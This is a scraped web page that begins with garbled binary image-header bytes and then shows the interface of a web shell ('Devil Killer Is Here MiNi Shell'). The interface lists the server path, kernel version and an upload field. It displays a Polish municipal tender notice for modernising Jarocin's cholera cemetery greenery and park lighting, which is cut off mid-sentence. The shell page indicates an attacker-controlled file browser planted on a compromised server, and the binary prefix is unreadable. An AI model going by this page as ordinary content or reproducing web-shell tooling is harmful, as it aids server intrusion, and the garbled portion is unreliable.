JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170427/75161-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.jarocin.pl' target='_blank'>http://www.jarocin.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 75161 - 2017
              z dnia 2017-04-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jarocin: Modernizacja terenów zieleni, tj. Cmentarz choleryków zlokalizowanego przy ul. Wrocławskiej w Jarocinie
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />Gmina Jarocin, krajowy numer identyfikacyjny 25085470200000, ul. Al. Niepodległości  10, 63-200   Jarocin, woj. wielkopolskie, państwo Polska, Michał Szymański tel. 627 499 543, e-mail: zielen@jarocin.pl,
                <br />"Zakład Usług Komunalnych" Spółka z ograniczoną odpowiedzialnością w Jarocinie, krajowy numer identyfikacyjny 25158094500000, ul. ul. Kasztanowa  18, 63200   Jarocin, woj. wielkopolskie, państwo Polska, Łukasz Ratajski tel. 509-342-252, email: techniczny@zuk-jarocin.pl <br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Jarocin, krajowy numer identyfikacyjny
              25085470200000, ul.
              Al. Niepodległości 
              10,
              63200  
              Jarocin, woj.
              wielkopolskie, państwo
              Polska, tel.
              627 499 500, e-mail
              zamowienia.publiczne@jarocin.pl, faks
              627 472 225.
              <br />
              Adres strony internetowej (URL): www.jarocin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />Zamawiającym odpowiedzialnym za przeprowadzenie zamówienia jest Gmina Jarocin, Al. Niepodległości 10, 63-200 Jarocin. Umowa zawarta w wyniku postępowania, zawarta zostanie pomiędzy Gminą Jarocin i Zakładem Usług komunalnych Sp. z o.o. w Jarocinie a Wykonawcą. Faktura za zadanie nr 1 zostanie wystawiona na Gminę Jarocin, faktura za zadanie nr 2 zostanie wystawiona na Zakład Usług Komunalnych Sp. z o.o.</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.jarocin.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.jarocin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę składa się pod rygorem nieważności w formie pisemnej.<br />
                Adres:
                <br />Urząd Miejski w Jarocinie  Kancelaria Burmistrza (pok. 32), Ul. Al. Niepodległości 10, 63 - 200 Jarocin.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Modernizacja terenów zieleni, tj. Cmentarz choleryków zlokalizowanego przy ul. Wrocławskiej w Jarocinie
<br /><b>Numer referencyjny: </b>WR-RGK.271.33.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>5.1. Zamówienie dotyczy: 

Zadanie nr 1: przeprowadzenie modernizacji terenów zieleni na terenie Miasta Jarocin, tj. Cmentarza choleryków przy ul. Wrocławskiej w Jarocinie.
Zakres przedmiotu zamówienia dotyczący zieleni na Cmentarzu choleryków w Jarocinie polega na modernizacji istniejącego terenu poprzez wprowadzenie nowej wieloletniej roślinności zarówno niskiej, średniej, jak i wysokiej, a także montażu elementów małej architektury, tj. koszy na śmieci i ławek. Dodatkowo projektuje się wprowadzenie 6 szt. elementów przestrzennych ze stali COR-TEN, na które składać się będzie 5 szt. płyt oraz 1 szt. krzyża. Zgodnie z założeniami projektu nawierzchnię stanowić będzie istniejące utwardzenie oraz nowa nawierzchnia wodo-przepuszczalna o powierzchni około 86 m2.

Zadanie nr 2: budowa oświetlenia  przyłącza kablowego oświetlenia parku  skweru przy ul. Wrocławskiej. 
	
ZADANIE NR 1:

Modernizacja terenu Cmentarza choleryków obejmie swoim zakresem następujące prace:

1) Prace rozbiórkowe:
	usunięcie istniejącego krzyża wraz z rabatą kwiatową i ogrodzeniem (prace związane 
z usunięciem istniejącego krzyża oraz jego uroczysta adoracja prowadzone będą w uzgodnieniu 
z właściwą Parafią Rzymskokatolicką)
	usunięcie kostki prowadzącej do krzyża wraz z obrzeżami/opornikami ,
	usunięcie białego grysu kamiennego oraz włókniny ściółkującej.

2) Prace uzupełniające w zakresie oporników:
	uzupełnienie istniejących betonowych oporników betonowych o wymiarach 6x30x100,
	ustawienie oporników  o wymiarach 10x25x100 posadowionych na ławie betonowej z betonu C12/15 (gr. 6 cm) oraz podsypce cementowo-piaskowej (gr. 3 cm).

3) Prace w zakresie nawierzchni  wodo-przepuszczalnej typu Hanse Grand lub równoważnej:
	wykorytowanie terenu na głębokość 35 cm,
	rozścielenie piasku kopanego wraz z zagęszczeniem - gr. 15 cm,
	rozłożenie podbudowy z kruszywa łamanego fr. 0/31,5 mm wraz z zagęszczeniem  - gr. 12 cm,
	rozłożenie warstwy dynamicznej HanseMineral lub równoważnej fr. 0/16 mm wraz 
z zagęszczeniem  gr. 5 cm,
	rozłożenie warstwy Hansegrand nawierzchnia lub równoważnej fr. 0/8 wraz z zagęszczeniem 
 gr. 3 cm,
	nadanie 2% spadków nawierzchni.

4) Prace w obrębie zieleni:
	wykopanie i przesadzenie w miejsce wskazane przez inwestora drzew i krzewów,
	wykarczowanie 2 szt. Drzew,
	przeprowadzenie cięć pielęgnacyjnych drzew zaadoptowanych,
	prace w obrębie nasadzeń Calamagrostis acutiflora Karl Foerster:
a)	wykorytowanie gruntu na głębokość 30 cm,
b)	 spulchnienie podglebia do głębokości 30 cm, 
c)	rozścielenie i zagęszczenie w wykorytowanych miejscach ziemi urodzajnej  warstwa gr. 25 cm,
d)	wprowadzenie nowych nasadzeń Calamagrostis acutiflora Karl Foerster, 
e)	zamontowanie obrzeży typu EKOBORDER/GEOBORD lub równoważnych na kotwy,
f)	wyściółkowanie roślinności korą drobnolistną fr. 8-32 mm na włókninie ściółkującej  gr. 5 cm.
	prace w obrębie nasadzeń Carpinus betulus:
a)	wykorytowanie gruntu na głębokość 60 cm,

c)	rozłożenie drenażu  100 na dnie wykopu wraz z włókniną filtracyjną, 
d)	rozścielenie i odpowiednie zagęszczenie w wykorytowanych miejscach ziemi urodzajnej  warstwa o gr. 45 cm,
e)	wprowadzeni nowych nasadzeń Carpinus betulus, 
f)	zamontowanie obrzeży typu EKOBORDER/GEOBORD lub równoważnych na kotwy, 
g)	wyściółkowanie roślinności korą drobnolistną fr. 8-32 mm na włókninie ściółkującej  gr. 5 cm.
	prace w obrębie nasadzeń Tilia tomentosa Brabant:
a)	wykonanie dołów pod nasadzenia drzew, 
b)	wprowadzenie nowych nasadzeń  Tilia tomentosa Brabant oraz Sorbus aucuparia, 
c)	wykonanie drenażu 100, 
d)	rozścielenie włókniny filtracyjnej, 
e)	wykonanie systemu napowietrzająco-nawadniającego,
f)	stabilizacja wprowadzonych nasadzeń za pomocą palików drewnianych oraz wiązadeł, 
g)	wykonanie mis wokół nasadzeń wraz z wypełnieniem ich korą drobnomieloną,
h)	wyrównanie i złagodzenie terenu od strony budynku usługowo-handlowego, 
	prace w obrębie trawnika:
a)	usunięcie istniejącej darni, 
b)	przekopanie gleby, wymieszanie wierzchnicy z ziemią urodzajną (gr. 15 cm),
c)	rozłożenie trawnika z rolki.
	montaż elementów małej architektury, tj. ławek i koszy posadowionych na fundamentach betonowych c12/15,
	montaż elementów przestrzennych ze stali COR-TEN posadowionych na fundamentach C20/25,

Wykaz gatunkowy projektowanej roślinności do nasadzenia na Cmentarzu choleryków w Jarocinie:
1)	Tilia tomentosa Brabant  lipa srebrzysta odm. Brabant - 31 szt.,
2)	Sorbus aucuparia  jarząb pospolity  2 szt.,
3)	Carpinus betulus  grab pospolity  239 szt.,
4)	Calamagrostis acutiflora Karl Foerester  trzcinnik ostrokwiatowy Karl Foerster -233 szt.
5)	trawa z rolki (Poa Pratensis - wiechlina łąkowa 60%, Lolium Perenne - żywica trwała 25%, Festuca Rubra  kostrzewa czerwona 15%) - pow. ok. 1005 m2.

Elementy przestrzenne:
Projektuje się montaż 6 elementów ze stali COR-TEN  zakotwionych w fundamentach betonowych wylewanych na mokro na placu budowy z betonu klasy C20/25. Elementy przestrzenne  płyty zaprojektowane zostały z blachy stalowej gr. 3mm gatunku S355JOW COR-TEN. Jako obudowę zewnętrzną zaprojektowano blachę perforowaną ze stali S355JOW COR-TEN gr. 2 mm o perforacji Rv 15-23 prześwit 39%. Element przestrzenny  krzyż projektuje się wykonać z blachy stalowej 4 mm gatunku S355JOW COR-TEN jako RK 120x120x4 lub w przypadku trudności z ugięciem blachy do postaci RK można wykonać ją z dwóch ceowników 120x6x4 i następnie zespawać w całość.


Szczegółowy opis przedmiotu zamówienia dotyczącego Modernizacji terenu Cmentarza choleryków w Jarocinie przedstawia projekt wykonawczy oraz specyfikacja techniczna wykonania i odbioru robót pn.: Modernizacja terenu cmentarza choleryków w Jarocinie. Natomiast konstrukcja stalowa elementów przestrzennych i ich fundamentowanie zawiera odrębny projekt wykonawczy pn. Modernizacja terenu Cmentarza choleryków w Jarocinie - konstrukcja stalowa i fundamentowanie.

W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do utrzymania i pielęgnacji nowo nasadzonej roślinności do dnia 31.12.2017r.

ZADANIE NR 2:
Budowa przyłącza kablowego oświetlenia parku - skweru przy ulicy Wrocławskiej w Jarocinie

Przyłącze energetyczne.
Zasilanie w/w obiektu w energię elektryczną odbywać się będzie z projektowanego złącza kablowego z układem pomiarowym zlokalizowanym obok istniejącego budynku stacji transformatorowej. Zasilanie oświetlenia parku skweru projektuje się wykonać z projektowanego złącza sterującego typu SOtwl w którym projektuje sią zabudować zegar sterujący.

Montaż przyłącza kablowego oświetlenia parku - skweru
Z projektowanego złącza kablowego sterowania oświetlenia parku projektuje się wyprowadzić przyłącze kablowe zasilania oświetlenia z zastosowaniem układu sterowania oświetleniem. Projektuje się pobudować przyłącze oświetlenia obwód I kabel YKY 3x6 mm2 o długości 45/61 m . Oświetlenie wykonać jako 1-fazowe.

Słupy oświetleniowe.
Dla potrzeb oświetlenia parku zaprojektowano słup oświetleniowy typu stalowego ocynkowane cylindryczne typ CC 4/76/132/3 z fundamentem FP 1 malowany w kolorze RAL DB 7025 w ilości szt. 1 lub o parametrach równoważnych . W słupach zastosować tabliczki TB-1. Słupy należy montować w miejscach wskazanych na planie.
Slup o parametrach równoważnych powinien spełniać w zakresie następujących parametrów:
- słup o konstrukcji stalowej ocynkowanej cylindrycznej o średnicy 146 mm przy podstawie i o średnicy 76 mm przy wierzchołku malowany w kolorze ,
-słup do montażu na fundamencie,
-grubość ścianki słupa 3 mm.
Dla potrzeb podświetlenia elementów architektonicznych projektuje się zabudowę oprawy oświetleniowe dogruntowe, których zadaniem będzie podświetlenie ścian wykonanych z blachy COR-TEN.

Oprawy oświetleniowe.
Dla oświetlenia parku zaprojektowano na słupie oprawę typu DL 30 LED 43 W Plus z optyką symetryczną 4000 K.
Dla optyki rozsyłu symetrycznym LED 43 W Plus zgodnie z planem sytuacyjnym (lub o podobna o równoważnych parametrach). Połączenie złącza TB-1 z oprawą wykonać przewodem YDY 3x1,5 mm .
Oprawa równoważna powinna spełniać w zakresie następujących parametrów:
Oprawa parkowa oświetlenia zewnętrznego gwarantująca na płaszczyźnie obliczeniowej co najmniej takie same parametry jak Streetlight DL 30 LED 43 W Plus.
-	całkowita moc oprawy nie większa niż 43 W (moc eksploatacji),
-	strumień świetlny oprawy nie mniejszy niż 3430 Im,
-	temperatura barwowa źródła światła LED - 4000K,
-	wskaźnik oddawania barw CRI &gt; 70,
-	nie akceptuje się stosowania opraw o dopuszczonej tolerancji w zakresie temperatury barwowej (np. 3500K - 4000K lub 4000K - 4500K),
-	krzywa LDT z optyką dedykowaną do oświetlenia parków,
-	optyka zaprojektowana w oparciu o odbłyśnik dedykowany dla źródeł światła LED,
-	dystrybucja strumienia świetlnego w górną półprzestrzeń 0%,
-	montaż bezpośrednio na słupie,
-	zasilacz LED z trwałością gwarantowaną 100 OOOh i z kontrolerem umożliwiającym komunikację z jednostką nadrzędną, która monitoruje parametry oprawy,
-	trwałość źródeł LED nie mniejsza niż 100 OOOh (L90/B10),
-	sterowani wartością mocy oprawy oraz monitorowanie parametrów pracy z wykorzystaniem przewodów zasilających, bez dodatkowego okablowania,
-	funkcja redukcji mocy realizowana poprzez obniżenie strumienia świetlnego całego modułu LED (strumień świetlny ulega redukcji o 50% przy zachowaniu rozsyłu bryły fotometrycznej oprawy jak dla 100% strumienia świetlnego),
-	standardowa ochrona przeciwprzepięciowa min 6 kV,
-	funkcja gwarantująca utrzymanie stałej wartości strumienia świetlnego w całym okresie eksploatacji (100000h),
-	IP66 dla całej oprawy,
-	waga oprawy nie większa niż 4,5 kg, pow. boczna wiatrowa nie większa niż 0,05mf,
-	II klasa ochronności elektrycznej,
-	gwarancja producenta co najmniej 5 lat,
-	certyfikat ENEC,
Podświetlenie profili z blachy COR-TEN.
Celem podświetlenia profili wykonanej z blachy COR-TEN projektuje się zabudować oprawy oświetleniowe dogruntowe typu Nano Liner Allegro AC XB 9 3000 K 50x10 st. o długości 30 cm oraz typu Nano Liner Allegro AC XB 18 3000 K 50x10 st. o długości 60 cm,, ilość i rozmieszczenie wg. planu sytuacyjnego.
Oprawy Nano Liner Allegro AC XB posiadają wysoka wydajność, energooszczędne, Ultra Slim liniowa rozwiązanie oświetleniowe dla środowisk zewnętrznych. Zasilana bezpośrednio z napięcia sieciowego AC, smukły Nano Liner Allegro AC XB jest idealnym rozwiązaniem dla wielu rodzajów zastosowań zewnętrznych architektonicznych.
Napięcie zasilania - AC napięcia zasilania (120V / 230V / 277V 2&gt; eliminuje konieczność stosowania zewnętrznych zasilaczy i pozwala przedłużyć bieg o długości do 50 stóp (120V) 80feet (230V) lub 90feet (277V).
Wysoka wydajność i skuteczność - 25 lm / W (RGB); 60 lm / W (3000K); 65 lm / W (4000K); i 84 lm / W (6500K), 300 lumenów na stopę (wersja RGB) i 635-865 lumenów na stopę przy 11 watach na piechotę (białe wersje).
Wiele długości osprzętu - Dostępna w jednej nodze, dwie stopy, trzy stopy i czterech stóp długości, Nano Liner Allegro AC XB łatwością pomieści różne wymagania dotyczące miejsca instalacji.
Elastyczny montaż celem - produkt jest wyposażony w 180 ° osi obrotu na elastyczne wiązki celowania.
Dwie opcje wiązki - 40 ° i 50 ° x 10 ° spready oferują delikatne oświetlenie lub bardziej skoncentrowane.
Proste okablowanie i połączenia - proste połączenie Plug'n'Play Nano Liner Allegro AC XB mogą być łańcuchowo, umożliwiając łatwą instalację i obniża koszty utrzymania.
Układ sterowania.
Układ sterowania oświetlenia parku -skweru umieszczony będzie w szafce która zaprojektowana jest obok złączą zasilającego. Projektuję zastosować szafkę w obudowie OSZ 40x60+F wyposażone tak jak przedstawiono na załączonym schemacie. Do sterowania oświetlenia projektuje się zastosować zegar astronomiczny typu PS0-02P produkcji Automatex Poznań wraz z układem stycznika.
Szczegółowy opis przedmiotu zamówienia przedstawia dokumentacja techniczna pn.: Budowa przyłącza kablowego oświetlenia parku  skweru przy ulicy Wrocławskiej. 

5.2. Szczegółowy zakres przedmiotu zamówienia stanowi Tom III SIWZ Dokumentacja projektowa oraz Tom V SIWZ Kosztorys ofertowy.
5.3. Szczegółowe zasady realizacji zamówienia zawiera Tom II SIWZ Projekt umowy.
5.4. Informacja nt. wymagań o których mowa w art. 29 ust. 3a
5.4.1. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę wszystkich osób wykonujących wszystkie prace i roboty będące  przedmiotem niniejszej umowy w trakcie realizacji zamówienia, z wyłączeniem Kierownika budowy oraz Inspektora Nadzoru Prac w Zieleni.
5.4.2. W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt. 5.4.1 czynności. Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny,
b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,
c)	przeprowadzania kontroli na miejscu wykonywania świadczenia.
5.4.3. W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym wezwaniu terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących wskazane w pkt. 5.4.1. czynności w trakcie realizacji zamówienia:
a)	oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;
b)	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. w szczególności bez imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;
c)	zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;
d)	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych.
5.4.4. Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia 
na podstawie umowy o pracę osób wykonujących wskazane w pkt. 5.4.1. czynności Zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości 1.000,00 złotych za każdy stwierdzony przypadek naruszenia obowiązku określonego w pkt. 5.4.1. Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie nie krótszym niż 7 dni, żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt. 5.4.1 czynności. 
5.4.5.	W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy 
przez wykonawcę lub podwykonawcę, Zamawiający może zwrócić się 
